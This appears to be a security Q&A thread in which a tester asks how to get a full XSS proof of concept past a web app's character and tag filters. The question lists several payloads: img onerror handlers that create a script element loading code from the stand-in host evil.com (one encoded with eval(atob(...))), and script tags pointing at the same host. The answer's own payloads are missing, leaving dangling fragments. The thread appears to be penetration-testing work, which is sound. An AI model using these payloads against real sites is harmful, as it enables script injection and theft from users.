I have found a web app that is vulnerable to XSS, and can get some javascript running using an img tag, however the method I am using destroys the rest of the page, as they are using some filters to attempt to stop it.
The filters I have detected so far are as follows:
</anythingyouwant>gets replaced with nothing/>gets replaced with nothing;gets replaced with a space until the next>- 135 character limit including method of delivery ex
<img src="." onerror="alert('xss')">
Injecting <img src="." onerror="alert('xss')"> works fine, however these developers are rather sceptical and wish to see a full PoC of full javascript code. Is it possible to run an arbitrary script at all?
I have tried:
<img src="." onerror="eval(atob('Yj1kb2N1bWVudDthPWIuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7YS5zcmM9Jy8vZXZpbC5jb20vbXlzY3JpcHQnO2IuYm9keS5hcHBlbmRDaGlsZChhKQ=='))">result: too long, even with a shortened URL<script src="//evil.com/myscript" />result: can't close script tags like that, and it gets filtered, and it destroys the rest of the page by web app omitting 'closing' tag<script src=//evil.com/myscript"></script>result: gets filtered, destroys rest of page as above<img src="." onerror="b=document;a=b.createElement('script');a.src='//evil.com/myscript';b.body.appendChild(a)">result: semicolons get filtered, breaks web page<img src="." onerror="b=document a=b.createElement('script') a.src='//evil.com/myscript' b.body.appendChild(a)">result: im unsure if this is valid js, but it appears in the chromeview page sourceas intended, but does not work as wanted
I am using chrome for testing, just in case it's relevant somehow.
The security measures you listed are definitely insufficient. Two examples I could imagine to work for you:
or your version with a
,instead of a;:But I am absolutely certain there are many other ways to do that. You could also check the following cheat sheet which I found in this answer.